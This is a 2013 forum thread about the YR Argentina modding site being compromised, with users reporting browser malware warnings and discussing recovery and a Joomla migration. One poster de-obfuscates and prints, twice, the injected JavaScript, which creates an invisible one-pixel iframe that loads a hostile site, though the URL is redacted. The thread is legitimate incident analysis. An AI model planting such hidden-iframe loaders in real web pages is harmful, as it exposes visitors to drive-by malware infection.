Project Perfect Mod Forums
:: Home :: Get Hosted :: PPM FAQ :: Forum FAQ :: Privacy Policy :: Search :: Memberlist :: Usergroups :: Register :: Profile :: Log in to check your private messages :: Log in ::


The time now is Thu Apr 18, 2024 5:40 am
All times are UTC + 0
YR Argentina infected?
Moderators: Global Moderators
Post new topic   Reply to topic Page 1 of 1 [36 Posts] Mark the topic unread ::  View previous topic :: View next topic
Author Message
gameaddict11707
Grenadier


Joined: 15 Jul 2011

PostPosted: Sat Jun 15, 2013 5:58 pm    Post subject:  YR Argentina infected? Reply with quote  Mark this post and the followings unread

I've tried to go onto YR Argentina the past couple days now, and whenever I do, AVG lights up mentioning a blackhole exploit kit-type of virus threat and doesn't let me go onto the site. After temporarily deactivating AVG (I had other AV programs, just wanted to see if they would chime in too), Google Chrome itself makes a mention about malware from some sketchy German website being injected into YRArg. (I don't remember what the sketchy site's URL was and I can't get the message to reappear)

Anyone else getting stuff similar to this when they try to go onto YR Argentina?

Back to top
View user's profile Send private message
tomsons26lv
Cyborg Artillery


Joined: 30 Dec 2009
Location: Latvia

PostPosted: Sat Jun 15, 2013 6:07 pm    Post subject: Reply with quote  Mark this post and the followings unread

Yup, Chrome
Quote:
Danger: Malware Ahead!
Google Chrome has blocked access to this page on yrarg.cncguild.net.
Content from www.toeppler-vertretungen.de, a known malware distributor, has been inserted into this web page. Visiting this page now is very likely to infect your computer with malware.
Malware is malicious software that causes things like identity theft, financial loss, and permanent file deletion. Learn more
Go back Details about www.toeppler-vertretungen.de  Proceed at your own risk  

_________________
Tiberian Dawn, Red Alert, Tiberian Sun ,Red Alert 2,Renegade, Command & Conquer 3,Tiberium and Tiberium Wars and Westwood related image & video archive
https://picasaweb.google.com/113361105083292812413?noredirect=1

Skype live:tomsons26
Don't forget to state who are you otherwise i'll ignore the invite

Back to top
View user's profile Send private message Visit poster's website
DaRkGlAcEoN
Rocket Cyborg


Joined: 13 May 2013
Location: Canada

PostPosted: Sat Jun 15, 2013 6:08 pm    Post subject: Reply with quote  Mark this post and the followings unread

Weird... I haven't had any problems with it...

_________________
You can call me Dark or Glace/Glaceon if my name is annoying to type.

4StarGeneral wrote:
I CAN USE CAPS TOO, HOW DOES IT FEEL?

Back to top
View user's profile Send private message
Zero18
Commander


Joined: 10 Dec 2012
Location: I'm too busy conquering the world!

PostPosted: Sat Jun 15, 2013 8:30 pm    Post subject: Reply with quote  Mark this post and the followings unread

Waterfox is way to go. I used to have Internet Explorer, then I moved on to google chrome, and now Waterfox. IE and Google Chrome are crap, they go super slow for me. But with Waterfox, it just load fast and everything is much smoother.

_________________
Mod Leader and founder of World Domination


Back to top
View user's profile Send private message
tomsons26lv
Cyborg Artillery


Joined: 30 Dec 2009
Location: Latvia

PostPosted: Sat Jun 15, 2013 9:23 pm    Post subject: Reply with quote  Mark this post and the followings unread

Zero18 wrote:
Waterfox is withto go. I used to have Internet Explorer, then I moved on to google chrome, and now Waterfox. IE and Google Chrome are crap, they go super slow for me. But with Waterfox, it just load fast and everything is much smoother.

Chrome checks every connections with a online known malware/spyware/virus/trojan/etc spredder sites database and if a site matches the db it displays that warning, Firefox had a similar function as well, Anyone who successfully was able to access this site after 12 of june can pretty much consider that their computer has been infested.
Unlike it sometimes happens with antiviruses these are not false positives

_________________
Tiberian Dawn, Red Alert, Tiberian Sun ,Red Alert 2,Renegade, Command & Conquer 3,Tiberium and Tiberium Wars and Westwood related image & video archive
https://picasaweb.google.com/113361105083292812413?noredirect=1

Skype live:tomsons26
Don't forget to state who are you otherwise i'll ignore the invite

Last edited by tomsons26lv on Sat Jun 15, 2013 10:03 pm; edited 2 times in total

Back to top
View user's profile Send private message Visit poster's website
gameaddict11707
Grenadier


Joined: 15 Jul 2011

PostPosted: Sat Jun 15, 2013 9:50 pm    Post subject: Reply with quote  Mark this post and the followings unread

Zero18 wrote:
Firefox is way to go. I used to have Internet Explorer, then I moved on to google chrome, and now Firefox. IE and Google Chrome are crap, they go super slow for me. But with Firefox, it just load fast and everything is much smoother.

Firefox LLLAAAGGGSSS when I use it, and when I try to do a bandwidth test on CNet, it gets thousands of Javascript errors. I barely use Explorer other than to download Firefox or Chrome.

Back to top
View user's profile Send private message
Zero18
Commander


Joined: 10 Dec 2012
Location: I'm too busy conquering the world!

PostPosted: Sat Jun 15, 2013 10:02 pm    Post subject: Reply with quote  Mark this post and the followings unread

FYI, it is WATERFOX, not firefox... it doesnt lag for me. Internet Explorer and Chrome does lags for me and way annoying. For Waterfox, very little to none. That's why I choose waterfox over other net program.

_________________
Mod Leader and founder of World Domination


Back to top
View user's profile Send private message
gameaddict11707
Grenadier


Joined: 15 Jul 2011

PostPosted: Sat Jun 15, 2013 10:12 pm    Post subject: Reply with quote  Mark this post and the followings unread

I thought you were being funny or something and calling Firefox "Waterfox". I had never heard of Waterfox until, well, when I read that post and looked it up for myself.

_________________
aka SavebearingBoss

Back to top
View user's profile Send private message
Renegade
Cyborg Artillery


Joined: 21 May 2006
Location: Hamburg, Germany

PostPosted: Sat Jun 15, 2013 11:06 pm    Post subject: Reply with quote  Mark this post and the followings unread

Since FF has one of the leading JS engines on the market, you can be pretty sure that the "thousands of Javascript errors" were due to bad development on the publisher's side, not due to FF.

IE also has a site security check proxy, like Chrome and FF.

As for the issue at hand, it looks like the maintainers of YR Arg have set it to a maintenance page because of the issue, but the issue remains on said maintenance page.

It looks like a very crude JavaScript injection, placing obfuscated JS code before and after the actual HTML of the site.

My guess would be an SQL injection attack dropping this into some template-related table, but it could just as well be a compromised PHP script.

And yes, as tomsons26lv pointed out, if you did end up going to the site and your AV protection didn't stop the script, you should worry. I'll try to de-obfuscate it to see what it actually does.

Update: This is the code that is actually executed on the page:
Code:
 function zzzfff() {
     var ultze = document.createElement('iframe');

     ultze.src = '[URL REMOVED BECAUSE PEOPLE ARE MORONS]';
     ultze.style.position = 'absolute';
     ultze.style.border = '0';
     ultze.style.height = '1px';
     ultze.style.width = '1px';
     ultze.style.left = '1px';
     ultze.style.top = '1px';

     if (!document.getElementById('ultze')) {
         document.write('<div></div>');
         document.getElementById('ultze').appendChild(ultze);
     }
 }

 function SetCookie(cookieName, cookieValue, nDays, path) {
     var today = new Date();
     var expire = new Date();
     if (nDays == null || nDays == 0) nDays = 1;
     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
 }

 function GetCookie(name) {
     var start = document.cookie.indexOf(name + "=");
     var len = start + name.length + 1;
     if ((!start) &&
         (name != document.cookie.substring(0, name.length))) {
         return null;
     }
     if (start == -1) return null;
     var end = document.cookie.indexOf(";", len);
     if (end == -1) end = document.cookie.length;
     return unescape(document.cookie.substring(len, end));
 }
 if (navigator.cookieEnabled) {
     if (GetCookie('visited_uq') == 55) {} else {
         SetCookie('visited_uq', '55', '1', '/');

         zzzfff();
     }
 }

For those not firm in JavaScript, it's injecting a tiny, pretty much invisible IFrame into the page to load a hostile site.
I'm writing an e-mail to the owner of the site that's being abused for the distribution to get it taken down.

_________________
#renproj:renegadeprojects.com via Matrix - direct link

Back to top
View user's profile Send private message Visit poster's website
MasterHaosis
General


Joined: 01 Nov 2010
Location: Serbia

PostPosted: Sun Jun 16, 2013 3:36 am    Post subject: Reply with quote  Mark this post and the followings unread


_________________

PPM Halloween Season 2021

Back to top
View user's profile Send private message
Banshee
Supreme Banshee


Also Known As: banshee_revora (Steam)
Joined: 15 Aug 2002
Location: Brazil

PostPosted: Sun Jun 16, 2013 3:49 am    Post subject: Reply with quote  Mark this post and the followings unread

YR Argentina has been fully compromised (FTP/MySQL) wise, probably due to an exploit in an old version of Joomla. Hopefully, things should be fixed in a couple of days.

Back to top
View user's profile Send private message Visit poster's website Skype Account
warlock
AA Infantry


Joined: 07 Jun 2006
Location: Bournemouth, UK

PostPosted: Wed Jun 19, 2013 10:06 am    Post subject: Reply with quote  Mark this post and the followings unread

Yeah... Also now YRArg is suspended... Yesterday I tried to go to the site...

Back to top
View user's profile Send private message Send e-mail YouTube User URL Skype Account AIM Address
RP
Commander


Joined: 12 Jul 2012
Location: Mapping God Heaven

PostPosted: Wed Jun 19, 2013 10:09 am    Post subject: Reply with quote  Mark this post and the followings unread

There's being worked on, and that takes some time.

_________________


Mental Omega 3.0 Mission creator - Creator of FinalOmega: APYR 3.0 Map Editor

/ppm/'s stupidity

Back to top
View user's profile Send private message
warlock
AA Infantry


Joined: 07 Jun 2006
Location: Bournemouth, UK

PostPosted: Wed Jun 19, 2013 10:30 am    Post subject: Reply with quote  Mark this post and the followings unread

Oh... That's good! Thanks for the new! Very Happy
Because is a really good resource site! Very Happy

Back to top
View user's profile Send private message Send e-mail YouTube User URL Skype Account AIM Address
Martin Killer
Missile Trooper


Joined: 27 Nov 2005

PostPosted: Wed Jun 19, 2013 10:50 am    Post subject: Reply with quote  Mark this post and the followings unread

The last uninfected backup is from february 2013, that's over 15-20 files to upload to be actual.

Back to top
View user's profile Send private message Visit poster's website Skype Account
Banshee
Supreme Banshee


Also Known As: banshee_revora (Steam)
Joined: 15 Aug 2002
Location: Brazil

PostPosted: Wed Jun 19, 2013 12:47 pm    Post subject: Reply with quote  Mark this post and the followings unread

Yea... but you can't use that version of Joomla again, since it actually causes trouble for every other site in the server, including PPM itself.

Back to top
View user's profile Send private message Visit poster's website Skype Account
Martin Killer
Missile Trooper


Joined: 27 Nov 2005

PostPosted: Wed Jun 19, 2013 12:49 pm    Post subject: Reply with quote  Mark this post and the followings unread

Still, we can do a fast migration of download to a still supported version of Joomla (2.5+). There is a tutorial how to do it, if it works, then I don't need to place over 800+ files manually. Most of components or plugins were free, only template was bought earlier.

Back to top
View user's profile Send private message Visit poster's website Skype Account
MasterHaosis
General


Joined: 01 Nov 2010
Location: Serbia

PostPosted: Wed Jun 19, 2013 2:50 pm    Post subject: Reply with quote  Mark this post and the followings unread

How did it actually got infected?

_________________

PPM Halloween Season 2021

Back to top
View user's profile Send private message
RP
Commander


Joined: 12 Jul 2012
Location: Mapping God Heaven

PostPosted: Wed Jun 19, 2013 2:57 pm    Post subject: Reply with quote  Mark this post and the followings unread

I dunno...

Renegade wrote:

Code: wrote:

function zzzfff() {
    var ultze = document.createElement('iframe');

    ultze.src = '[URL REMOVED BECAUSE PEOPLE ARE MORONS]';
    ultze.style.position = 'absolute';
    ultze.style.border = '0';
    ultze.style.height = '1px';
    ultze.style.width = '1px';
    ultze.style.left = '1px';
    ultze.style.top = '1px';

    if (!document.getElementById('ultze')) {
        document.write('<div></div>');
        document.getElementById('ultze').appendChild(ultze);
    }
}

function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0) nDays = 1;
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");
    var len = start + name.length + 1;
    if ((!start) &&
        (name != document.cookie.substring(0, name.length))) {
        return null;
    }
    if (start == -1) return null;
    var end = document.cookie.indexOf(";", len);
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
    if (GetCookie('visited_uq') == 55) {} else {
        SetCookie('visited_uq', '55', '1', '/');

        zzzfff();
    }
}

For those not firm in JavaScript, it's injecting a tiny, pretty much invisible IFrame into the page to load a hostile site.
I'm writing an e-mail to the owner of the site that's being abused for the distribution to get it taken down.

_________________


Mental Omega 3.0 Mission creator - Creator of FinalOmega: APYR 3.0 Map Editor

/ppm/'s stupidity

Back to top
View user's profile Send private message
Banshee
Supreme Banshee


Also Known As: banshee_revora (Steam)
Joined: 15 Aug 2002
Location: Brazil

PostPosted: Wed Jun 19, 2013 3:21 pm    Post subject: Reply with quote  Mark this post and the followings unread

Phil is trying to figure out how the javascript infection happened. According to him, it happened on june 15th, however the site was compromised 9 days earlier.

Back to top
View user's profile Send private message Visit poster's website Skype Account
Martin Killer
Missile Trooper


Joined: 27 Nov 2005

PostPosted: Wed Jun 19, 2013 7:42 pm    Post subject: Reply with quote  Mark this post and the followings unread

Ok, I've got back password to my FTP account and that's how it looks for today:
    1. Migration from unsupported anymore 1.5 to 2.5 is a must.
    2. Because of migration, some commercial thingies like template or some plugins won't be back. Spending 50$ on this would be a stupid move imho.
    3. The best thing is that I have uninfected backup from 25th of April 2013. Thus I will have only to reupload 10 to 15 files.
    4. Because I've never made a migration from older to a newer version it will take some time till website gets public. I will try to migrate all users, comments, articles and so on, but on first place is download with 750+ files. If I fail to migrate everything except download, site will be public for sure - only files are important imho

Back to top
View user's profile Send private message Visit poster's website Skype Account
Sir Shockwave
Cyborg Firebomber


Joined: 06 Sep 2011

PostPosted: Thu Jun 20, 2013 7:19 am    Post subject: Reply with quote  Mark this post and the followings unread

I'm having a similar problem at the moment, except I keep getting a "403 Forbidden" error. Glad to see it's not just us having problems.

Back to top
View user's profile Send private message
Banshee
Supreme Banshee


Also Known As: banshee_revora (Steam)
Joined: 15 Aug 2002
Location: Brazil

PostPosted: Thu Jun 20, 2013 11:59 am    Post subject: Reply with quote  Mark this post and the followings unread

The 403 problem that you are getting at YR Argentina is done in purpose. Somethings about this hacking event still needs to be fixed before the site returns.

Back to top
View user's profile Send private message Visit poster's website Skype Account
DarkVen9109
Pyro Sniper


Joined: 02 Nov 2012
Location: Philippines

PostPosted: Thu Jun 20, 2013 12:14 pm    Post subject: Reply with quote  Mark this post and the followings unread

Gerrd just visited the site and is really forbidden. Dang!!

Back to top
View user's profile Send private message Send e-mail
Renegade
Cyborg Artillery


Joined: 21 May 2006
Location: Hamburg, Germany

PostPosted: Fri Jun 21, 2013 6:56 pm    Post subject: Reply with quote  Mark this post and the followings unread

Would this be a good moment to point out that Joomla sucks?

Seriously, there is no clean upgrade path from 1.5 to 2.5, afaik, so you're looking at a fresh installation and a whole lot of redoing anyway.

So use the opportunity to take a look around, compare, and get rid of Joomla.

Also, unless somebody manually deleted those uploaded files, they should still be on the server. While it of course can't be ruled out, it's unlikely they've been infected with something, and there are enough Linux CLI AV scanners to check them. You can/should also compare the hashes of the uploaded files against your local copies.

If the uploaded files are clean, there's no reason to re-upload them. Just copy the clean uploads elsewhere, renew the CMS, and move the uploads back.

_________________
#renproj:renegadeprojects.com via Matrix - direct link

Back to top
View user's profile Send private message Visit poster's website
Banshee
Supreme Banshee


Also Known As: banshee_revora (Steam)
Joined: 15 Aug 2002
Location: Brazil

PostPosted: Fri Jun 21, 2013 9:14 pm    Post subject: Reply with quote  Mark this post and the followings unread

If it depended only on me, I'd never have used Joomla. I'd use the The 3rd Aage Articles System, which is the Revora official CMS software.

Back to top
View user's profile Send private message Visit poster's website Skype Account
Martin Killer
Missile Trooper


Joined: 27 Nov 2005

PostPosted: Sun Jun 23, 2013 8:14 pm    Post subject: Reply with quote  Mark this post and the followings unread


Back to top
View user's profile Send private message Visit poster's website Skype Account
!DarkRose
Commander


Joined: 13 Aug 2006
Location: U.K, Birmingham

PostPosted: Sun Jun 23, 2013 8:30 pm    Post subject: Reply with quote  Mark this post and the followings unread

:3
Good to have you back online!

_________________

Silly taco fumbling unicorns nocturnally launch basketballs, Hell March.

Back to top
View user's profile Send private message Send e-mail Visit poster's website
MasterHaosis
General


Joined: 01 Nov 2010
Location: Serbia

PostPosted: Mon Jun 24, 2013 12:40 am    Post subject: Reply with quote  Mark this post and the followings unread

Renegade wrote:
Would this be a good moment to point out that Joomla sucks?

I would not like to sound as smartass, really, but if you ask me, just name Joomla sucks, and I haven't heard any more idiotic name for something than it is. But really. Just it's name looks like they came from cartoon. Dumb and retarded name, although its matter of personnel opinion, and also it is matter of how is Joomla useful actually rather than how it sounds. but according to comments, it is not much useful either.

Back to top
View user's profile Send private message
Banshee
Supreme Banshee


Also Known As: banshee_revora (Steam)
Joined: 15 Aug 2002
Location: Brazil

PostPosted: Mon Jun 24, 2013 1:11 am    Post subject: Reply with quote  Mark this post and the followings unread


Last edited by Banshee on Mon Jun 24, 2013 1:40 am; edited 1 time in total

Back to top
View user's profile Send private message Visit poster's website Skype Account
MasterHaosis
General


Joined: 01 Nov 2010
Location: Serbia

PostPosted: Mon Jun 24, 2013 1:27 am    Post subject: Reply with quote  Mark this post and the followings unread

That is good to hear indeed

_________________

PPM Halloween Season 2021

Back to top
View user's profile Send private message
!DarkRose
Commander


Joined: 13 Aug 2006
Location: U.K, Birmingham

PostPosted: Mon Jun 24, 2013 6:39 am    Post subject: Reply with quote  Mark this post and the followings unread

Banshee wrote:
!DarkRose wrote:
:3
Good to have you back online!


He means that YR Argentina is back online.
http://yrarg.cncguild.net


I know Wink

_________________

Silly taco fumbling unicorns nocturnally launch basketballs, Hell March.

Back to top
View user's profile Send private message Send e-mail Visit poster's website
Deformat
Defense Minister


Joined: 17 Sep 2007

PostPosted: Mon Jun 24, 2013 4:42 pm    Post subject: Reply with quote  Mark this post and the followings unread

Good to see you still around, DR!

Back to top
View user's profile Send private message
!DarkRose
Commander


Joined: 13 Aug 2006
Location: U.K, Birmingham

PostPosted: Wed Jun 26, 2013 1:01 am    Post subject: Reply with quote  Mark this post and the followings unread

Yup, still visit here when i can.  ^_^
Been busy with job and stuffs but got back into modding again, so I've started working on some secret stuff.  :3

_________________

Silly taco fumbling unicorns nocturnally launch basketballs, Hell March.

Back to top
View user's profile Send private message Send e-mail Visit poster's website
Martin Killer
Missile Trooper


Joined: 27 Nov 2005

PostPosted: Tue Jul 02, 2013 11:32 am    Post subject: Reply with quote  Mark this post and the followings unread

Back online with an old template

Back to top
View user's profile Send private message Visit poster's website Skype Account
MasterHaosis
General


Joined: 01 Nov 2010
Location: Serbia

PostPosted: Tue Jul 02, 2013 11:44 am    Post subject: Reply with quote  Mark this post and the followings unread

So you are indeed killer. You killed virus. Very Happy

_________________

PPM Halloween Season 2021

Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic Page 1 of 1 [36 Posts] Mark the topic unread ::  View previous topic :: View next topic
 
Share on TwitterShare on FacebookShare on Google+Share on DiggShare on RedditShare on PInterestShare on Del.icio.usShare on Stumble Upon
Quick Reply
Username:


If you are visually impaired or cannot otherwise answer the challenges below please contact the Administrator for help.


Write only two of the following words separated by a sharp: Brotherhood, unity, peace! 

 
You cannot post new topics in this forum
You can reply to topics in this forum
You can edit your posts in this forum
You can delete your posts in this forum
You can vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © phpBB Group

[ Time: 0.1807s ][ Queries: 11 (0.0088s) ][ Debug on ]